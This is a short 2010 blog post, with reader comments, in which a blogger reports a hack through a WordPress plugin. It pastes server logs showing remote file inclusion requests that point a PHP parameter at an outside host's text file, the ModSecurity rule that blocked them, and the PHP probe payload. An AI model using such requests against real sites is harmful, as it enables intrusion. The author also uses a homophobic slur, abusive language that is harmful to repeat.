Blog was hacked +
My blog was hacked by some fag from somewhere due to an exploit in Wordpress plugin HashCash.
The server load surged to 300 and I have to disable Wordpress temporarily and re-install 2.9.1
77.221.130.17 - - [05/Jan/2010:04:01:27 -0800] "GET //components/com_hashcash
/server.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt??
HTTP/1.1" 503 532 "-" "Mozilla/5.0"
77.221.130.17 - - [05/Jan/2010:04:01:27 -0800] "GET /archives/242//components
/com_hashcash/server.php?mosConfig_absolute_path=http://photoworld.com.ua////
zfxid1.txt?? HTTP/1.1" 503 532 "-" "Mozilla/5.0"
77.221.130.17 - - [05/Jan/2010:04:01:27 -0800] "GET /archives//components/com
_hashcash/server.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxi
d1.txt?? HTTP/1.1" 503 532 "-" "Mozilla/5.0"
[Tue Jan 05 04:01:27 2010] [error] [client 77.221.130.17] ModSecurity: Access
denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|
dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at
REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootki
ts.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: G
eneric Attempt to remote include command shell"] [severity "CRITICAL"] [hos
tname "blog.est.im"] [uri "/components/com_hashcash/server.php"] [unique_id
"S0MqF0Wji1IAAEzEq5kAAAAK"]
[Tue Jan 05 04:01:27 2010] [error] [client 77.221.130.17] ModSecurity: Access
denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|
dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at
REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootki
ts.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: G
eneric Attempt to remote include command shell"] [severity "CRITICAL"] [hos
tname "blog.est.im"] [uri "/archives/242//components/com_hashcash/server.ph
p"] [unique_id "S0MqF0Wji1IAAEpmXZcAAAAJ"]
[Tue Jan 05 04:01:27 2010] [error] [client 77.221.130.17] ModSecurity: Access
denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|
dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at
REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootki
ts.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: G
eneric Attempt to remote include command shell"] [severity "CRITICAL"] [hos
tname "blog.est.im"] [uri "/archives//components/com_hashcash/server.php"]
[unique_id "S0MqF0Wji1IAAEmWRFIAAAAI"]
http://photoworld.com.ua////zfxid1.txt
zfxid.txt
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
When upgrading Wordpress 2.9.1 I lost some of my modification to Wordpress, and I have to type them letter by letter again in a slow SSH terminal. Fuck!
哈哈
Why have your blog in yo2.cn been deleted ? It has made many links failed .
BTW,this blog doesn't block by wall. Why do you have to type in a slow SSH terminal?
@dfs
Ask yo2.cn for why.
Fuck yo2.cn & its administrator.
edit it at localhost then scp it to remote host
Hi! If you do install everything in the same style, that means your site is still vulnerable. You need to uninstall the software with "Remote Code Injection" bug. This is an extremely dangerous bug. Attacker may delete everything you have. You can find detailed information about this type of attacks in the article "Anatomy and dissecting of Remote Code Injection Attacks" You may check suspicious IP numbers also in that site.
有点悲剧!